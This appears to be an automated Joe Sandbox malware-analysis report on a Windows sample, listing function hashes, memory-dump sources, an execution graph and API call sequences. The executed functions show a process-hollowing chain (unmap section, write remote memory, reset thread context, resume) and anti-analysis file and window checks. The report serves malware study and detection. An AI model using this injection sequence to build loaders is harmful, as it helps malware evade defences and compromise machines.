                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
                                                                                                  • String ID: vector<T> too long
                                                                                                  • API String ID: 1327501947-3788999226
                                                                                                  • Opcode ID: 1bfec74ce1320eefcdc9ae333d00d9e9fa03295fad3003f73d6f4c9085cf79ee
                                                                                                  • Instruction ID: e8ff6f7d1438dbc4cc0d31425bbcf17e71e6c586c3cd126e38002517ea96b8c1
                                                                                                  • Opcode Fuzzy Hash: 1bfec74ce1320eefcdc9ae333d00d9e9fa03295fad3003f73d6f4c9085cf79ee
                                                                                                  • Instruction Fuzzy Hash: AB0192B25003105BE3309F1AE801797B7E8AF40765F14842EE99993781F7B9E984C7D9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040C919 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _fputws$CreateDirectory
                                                                                                  • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                  • API String ID: 2590308727-54166481
                                                                                                  • Opcode ID: b861cdce013af4209bc30e04672f112ccf944bab98ef41955443f7e5140c860b
                                                                                                  • Instruction ID: 548e7949761e073c688dfdb6472f733b12cf2ebad02737ba307de427565b7e5f
                                                                                                  • Opcode Fuzzy Hash: b861cdce013af4209bc30e04672f112ccf944bab98ef41955443f7e5140c860b
                                                                                                  • Instruction Fuzzy Hash: 9911E672A00315EBCF20DF65DC8579A77A0AF10318F10063BED5962291E37A99588BCA
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00420DB3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • Assertion failed: %s, file %s, line %d, xrefs: 00420E13
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __calloc_crt
                                                                                                  • String ID: Assertion failed: %s, file %s, line %d
                                                                                                  • API String ID: 3494438863-969893948
                                                                                                  • Opcode ID: 561489f2e4af6d624f58dbcfcda68910edfdae4a72d1be81448c26c2074ac95f
                                                                                                  • Instruction ID: 3c5265aa1bf4e9f5ad4874ec33d215fa8746995624eee7e22a7137551c8458fa
                                                                                                  • Opcode Fuzzy Hash: 561489f2e4af6d624f58dbcfcda68910edfdae4a72d1be81448c26c2074ac95f
                                                                                                  • Instruction Fuzzy Hash: 75F0A97130A2218BE734DB75BC51B6A27D5AF22724B51082FF100DA5C2E73C88425699
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00480620 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 00480686
                                                                                                    • Part of subcall function 00454C00: _raise.LIBCMT ref: 00454C18
                                                                                                  Strings
                                                                                                  • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 0048062E
                                                                                                  • .\crypto\evp\digest.c, xrefs: 00480638
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset_raise
                                                                                                  • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                                                                                                  • API String ID: 1484197835-3867593797
                                                                                                  • Opcode ID: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                                                                                                  • Instruction ID: 96aa535d5fc7c596ca855a62b55a20e08de4f59c43588781e3518ec4b5147bd0
                                                                                                  • Opcode Fuzzy Hash: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                                                                                                  • Instruction Fuzzy Hash: 82012C756002109FC311EF09EC42E5AB7E5AFC8304F15446AF6889B352E765EC558B99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0044F23E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • std::exception::exception.LIBCMT ref: 0044F251
                                                                                                    • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0044F266
                                                                                                    • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                                                                                                  • String ID: TeM
                                                                                                  • API String ID: 757275642-2215902641
                                                                                                  • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                  • Instruction ID: d1ee5d24d6598838e25116ba354c7cf631fb5eda6106ebacc41b25e9fbee45cd
                                                                                                  • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                  • Instruction Fuzzy Hash: 8FD06774D0020DBBCB04EFA5D59ACCDBBB8AA04348F009567AD1597241EA78A7498B99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:1.2%
                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                  Signature Coverage:0%
                                                                                                  Total number of Nodes:38
                                                                                                  Total number of Limit Nodes:8
                                                                                                  execution_graph 32006 44a7026 32007 44a7035 32006->32007 32010 44a77c6 32007->32010 32011 44a77e1 32010->32011 32012 44a77ea CreateToolhelp32Snapshot 32011->32012 32013 44a7806 Module32First 32011->32013 32012->32011 32012->32013 32014 44a703e 32013->32014 32015 44a7815 32013->32015 32017 44a7485 32015->32017 32018 44a74b0 32017->32018 32019 44a74f9 32018->32019 32020 44a74c1 VirtualAlloc 32018->32020 32019->32019 32020->32019 32021 5de0000 32024 5de0630 32021->32024 32023 5de0005 32025 5de064c 32024->32025 32027 5de1577 32025->32027 32030 5de05b0 32027->32030 32033 5de05dc 32030->32033 32031 5de061e 32032 5de05e2 GetFileAttributesA 32032->32033 32033->32031 32033->32032 32035 5de0420 32033->32035 32036 5de04f3 32035->32036 32037 5de04ff CreateWindowExA 32036->32037 32038 5de04fa 32036->32038 32037->32038 32039 5de0540 PostMessageA 32037->32039 32038->32033 32040 5de055f 32039->32040 32040->32038 32042 5de0110 VirtualAlloc GetModuleFileNameA 32040->32042 32043 5de017d CreateProcessA 32042->32043 32044 5de0414 32042->32044 32043->32044 32046 5de025f VirtualFree VirtualAlloc Wow64GetThreadContext 32043->32046 32044->32040 32046->32044 32047 5de02a9 ReadProcessMemory 32046->32047 32048 5de02e5 VirtualAllocEx NtWriteVirtualMemory 32047->32048 32049 5de02d5 NtUnmapViewOfSection 32047->32049 32050 5de033b 32048->32050 32049->32048 32051 5de039d WriteProcessMemory Wow64SetThreadContext ResumeThread 32050->32051 32052 5de0350 NtWriteVirtualMemory 32050->32052 32053 5de03fb ExitProcess 32051->32053 32052->32050

                                                                                                  Executed Functions

                                                                                                  Function 05DE0110 Relevance: 22.7, APIs: 15, Instructions: 248memorynativethreadCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 05DE0156
                                                                                                  • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 05DE016C
                                                                                                  • CreateProcessA.KERNELBASE(?,00000000), ref: 05DE0255
                                                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 05DE0270
                                                                                                  • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 05DE0283
                                                                                                  • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 05DE029F
                                                                                                  • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 05DE02C8
                                                                                                  • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 05DE02E3
                                                                                                  • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 05DE0304
                                                                                                  • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 05DE032A
                                                                                                  • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 05DE0399
                                                                                                  • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 05DE03BF
                                                                                                  • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 05DE03E1
                                                                                                  • ResumeThread.KERNELBASE(00000000), ref: 05DE03ED
                                                                                                  • ExitProcess.KERNEL32(00000000), ref: 05DE0412
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                                                                                                  • String ID:
                                                                                                  • API String ID: 93872480-0
                                                                                                  • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                  • Instruction ID: 3c99eb84f86120d0ddbb557018f858e2931c5134906ed2288405bf6991fe53f6
                                                                                                  • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                  • Instruction Fuzzy Hash: B4B1C874A00208AFDB44CF98C895FAEBBB5FF88314F248158E549AB395D771AE41CF94
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DE0420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 15 5de0420-5de04f8 17 5de04ff-5de053c CreateWindowExA 15->17 18 5de04fa 15->18 20 5de053e 17->20 21 5de0540-5de0558 PostMessageA 17->21 19 5de05aa-5de05ad 18->19 20->19 22 5de055f-5de0563 21->22 22->19 23 5de0565-5de0579 22->23 23->19 25 5de057b-5de0582 23->25 26 5de05a8 25->26 27 5de0584-5de0588 25->27 26->22 27->26 28 5de058a-5de0591 27->28 28->26 29 5de0593-5de0597 call 5de0110 28->29 31 5de059c-5de05a5 29->31 31->26
                                                                                                  APIs
                                                                                                  • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 05DE0533
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateWindow
                                                                                                  • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                                                                                  • API String ID: 716092398-2341455598
                                                                                                  • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                  • Instruction ID: 1ce609e0e41bfe1c81493749e96be1060084855a3b50d4e3ffb1914e6189cbb6
                                                                                                  • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                  • Instruction Fuzzy Hash: 7D511670D08388DAEB11DBA8C849BADBFB2AF11708F144059D5446F2C6C3FA5659CB62
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DE05B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 32 5de05b0-5de05d5 33 5de05dc-5de05e0 32->33 34 5de061e-5de0621 33->34 35 5de05e2-5de05f5 GetFileAttributesA 33->35 36 5de05f7-5de05fe 35->36 37 5de0613-5de061c 35->37 36->37 38 5de0600-5de060b call 5de0420 36->38 37->33 40 5de0610 38->40 40->37
                                                                                                  APIs
                                                                                                  • GetFileAttributesA.KERNELBASE(apfHQ), ref: 05DE05EC
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AttributesFile
                                                                                                  • String ID: apfHQ$o
                                                                                                  • API String ID: 3188754299-2999369273
                                                                                                  • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                  • Instruction ID: c9f7ed62a2051b937cea3a2eb9965a7b660bc0e3c873b3c1fa783b65a0c88571
                                                                                                  • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                  • Instruction Fuzzy Hash: 66011E70C0424CEBDB11EB98C5183AEBFB5AF41308F14809DC4492B241D7B69B59CBA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 044A77C6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 41 44a77c6-44a77df 42 44a77e1-44a77e3 41->42 43 44a77ea-44a77f6 CreateToolhelp32Snapshot 42->43 44 44a77e5 42->44 45 44a77f8-44a77fe 43->45 46 44a7806-44a7813 Module32First 43->46 44->43 45->46 51 44a7800-44a7804 45->51 47 44a781c-44a7824 46->47 48 44a7815-44a7816 call 44a7485 46->48 52 44a781b 48->52 51->42 51->46 52->47
                                                                                                  APIs
                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 044A77EE
                                                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 044A780E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012495232.00000000044A7000.00000040.00000020.00020000.00000000.sdmp, Offset: 044A7000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44a7000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                  • String ID:
                                                                                                  • API String ID: 3833638111-0
                                                                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                  • Instruction ID: 9c900c7e7953c5b91cde868b8c40b9ff7245fc14cb55512f4a647b283dc5f4f3
                                                                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                  • Instruction Fuzzy Hash: DFF062362007146BEB303FB5A88DA6BB6E8AF59725F10052EE642911C0DA74F8558661
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 044A7485 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 54 44a7485-44a74bf call 44a7798 57 44a750d 54->57 58 44a74c1-44a74f4 VirtualAlloc call 44a7512 54->58 57->57 60 44a74f9-44a750b 58->60 60->57
                                                                                                  APIs
                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 044A74D6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012495232.00000000044A7000.00000040.00000020.00020000.00000000.sdmp, Offset: 044A7000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44a7000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 4275171209-0
                                                                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                  • Instruction ID: 4f206f1b00ac3d2c4adf0072653cbceab878b63c0bf7016b0133c05588200153
                                                                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                  • Instruction Fuzzy Hash: 95113C79A00208EFDB01DF98C985E99BBF5AF08351F058095F9489B362D371EA90DF80
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Non-executed Functions

                                                                                                  Function 05E06437 Relevance: 18.1, APIs: 12, Instructions: 84COMMONLIBRARYCODE
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 551 5e06437-5e06440 552 5e06442-5e06446 551->552 553 5e06466 551->553 552->553 554 5e06448-5e06459 call 5e09636 552->554 555 5e06468-5e0646b 553->555 558 5e0645b-5e06460 call 5e05ba8 554->558 559 5e0646c-5e0647d call 5e09636 554->559 558->553 564 5e06488-5e0649a call 5e09636 559->564 565 5e0647f-5e06480 call 5e0158d 559->565 570 5e064ac-5e064cd call 5e05f4c call 5e06837 564->570 571 5e0649c-5e064aa call 5e0158d * 2 564->571 569 5e06485-5e06486 565->569 569->558 580 5e064e2-5e06500 call 5e0158d call 5e04edc call 5e04d82 call 5e0158d 570->580 581 5e064cf-5e064dd call 5e0557d 570->581 571->569 590 5e06507-5e06509 580->590 587 5e06502-5e06505 581->587 588 5e064df 581->588 587->590 588->580 590->555
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
                                                                                                  • String ID:
                                                                                                  • API String ID: 1442030790-0
                                                                                                  • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                                                                                  • Instruction ID: 2c9afba62720c09a83e795a5cb0fe5c198e1a1a58a7a74963dcc1fcedd2ac193
                                                                                                  • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                                                                                  • Instruction Fuzzy Hash: BD21D131204201AEEB257FA5EC09E5B7BE5FF41764B50B429F4C6590E1EA2285E0CA91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05E03F16 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 595 5e03f16-5e03f2f 596 5e03f31-5e03f3b call 5e05ba8 call 5e04c72 595->596 597 5e03f49-5e03f5e call 5e0bdc0 595->597 606 5e03f40 596->606 597->596 602 5e03f60-5e03f63 597->602 604 5e03f65 602->604 605 5e03f77-5e03f7d 602->605 607 5e03f67-5e03f69 604->607 608 5e03f6b-5e03f75 call 5e05ba8 604->608 609 5e03f89-5e03f9a call 5e10504 call 5e101a3 605->609 610 5e03f7f 605->610 611 5e03f42-5e03f48 606->611 607->605 607->608 608->606 619 5e03fa0-5e03fac call 5e101cd 609->619 620 5e04185-5e0418f call 5e04c9d 609->620 610->608 613 5e03f81-5e03f87 610->613 613->608 613->609 619->620 625 5e03fb2-5e03fbe call 5e101f7 619->625 625->620 628 5e03fc4-5e03fcb 625->628 629 5e0403b-5e04046 call 5e102d9 628->629 630 5e03fcd 628->630 629->611 636 5e0404c-5e0404f 629->636 632 5e03fd7-5e03ff3 call 5e102d9 630->632 633 5e03fcf-5e03fd5 630->633 632->611 640 5e03ff9-5e03ffc 632->640 633->629 633->632 638 5e04051-5e0405a call 5e10554 636->638 639 5e0407e-5e0408b 636->639 638->639 648 5e0405c-5e0407c 638->648 642 5e0408d-5e0409c call 5e10f40 639->642 643 5e04002-5e0400b call 5e10554 640->643 644 5e0413e-5e04140 640->644 651 5e040a9-5e040d0 call 5e10e90 call 5e10f40 642->651 652 5e0409e-5e040a6 642->652 643->644 653 5e04011-5e04029 call 5e102d9 643->653 644->611 648->642 661 5e040d2-5e040db 651->661 662 5e040de-5e04105 call 5e10e90 call 5e10f40 651->662 652->651 653->611 658 5e0402f-5e04036 653->658 658->644 661->662 667 5e04113-5e04122 call 5e10e90 662->667 668 5e04107-5e04110 662->668 671 5e04124 667->671 672 5e0414f-5e04168 667->672 668->667 673 5e04126-5e04128 671->673 674 5e0412a-5e04138 671->674 675 5e0416a-5e04183 672->675 676 5e0413b 672->676 673->674 677 5e04145-5e04147 673->677 674->676 675->644 676->644 677->644 678 5e04149 677->678 678->672 679 5e0414b-5e0414d 678->679 679->644 679->672
                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 05E03F51
                                                                                                    • Part of subcall function 05E05BA8: __getptd_noexit.LIBCMT ref: 05E05BA8
                                                                                                  • __gmtime64_s.LIBCMT ref: 05E03FEA
                                                                                                  • __gmtime64_s.LIBCMT ref: 05E04020
                                                                                                  • __gmtime64_s.LIBCMT ref: 05E0403D
                                                                                                  • __allrem.LIBCMT ref: 05E04093
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05E040AF
                                                                                                  • __allrem.LIBCMT ref: 05E040C6
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05E040E4
                                                                                                  • __allrem.LIBCMT ref: 05E040FB
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05E04119
                                                                                                  • __invoke_watson.LIBCMT ref: 05E0418A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 384356119-0
                                                                                                  • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                  • Instruction ID: c372855331b8ab95c6863110082e03b2b845246da20cf61dbba51b75361f4471
                                                                                                  • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                  • Instruction Fuzzy Hash: 7871F971B00716ABEB249E79CD45BAAB3B9BF04324F147539F994D72C0E770D9808790
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05E0650E Relevance: 16.6, APIs: 11, Instructions: 131COMMONLIBRARYCODE
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
                                                                                                  • String ID:
                                                                                                  • API String ID: 3432600739-0
                                                                                                  • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                                                                                  • Instruction ID: 28515901f672e698395d769db16ab65f78d472ffffe58d1e62fa0d1b7aaed74b
                                                                                                  • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                                                                                  • Instruction Fuzzy Hash: 5B413432A04308AFEB00AFA4ED88B9E3BE5FF04314F107429E985961D1DB7596D5DB11
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05E084AB Relevance: 16.6, APIs: 11, Instructions: 92COMMONLIBRARYCODE
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 744 5e084ab-5e084d9 call 5e08477 749 5e084f3-5e0850b call 5e0158d 744->749 750 5e084db-5e084de 744->750 757 5e08524-5e0855a call 5e0158d * 3 749->757 758 5e0850d-5e0850f 749->758 751 5e084e0-5e084eb call 5e0158d 750->751 752 5e084ed 750->752 751->750 751->752 752->749 769 5e0856b-5e0857e 757->769 770 5e0855c-5e08562 757->770 760 5e08511-5e0851c call 5e0158d 758->760 761 5e0851e 758->761 760->758 760->761 761->757 774 5e08580-5e08587 call 5e0158d 769->774 775 5e0858d-5e08594 769->775 770->769 771 5e08564-5e0856a call 5e0158d 770->771 771->769 774->775 778 5e085a3-5e085ae 775->778 779 5e08596-5e0859d call 5e0158d 775->779 782 5e085b0-5e085bc 778->782 783 5e085cb-5e085cd 778->783 779->778 782->783 785 5e085be-5e085c5 call 5e0158d 782->785 785->783
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$ExitProcess___crt
                                                                                                  • String ID:
                                                                                                  • API String ID: 1022109855-0
                                                                                                  • Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
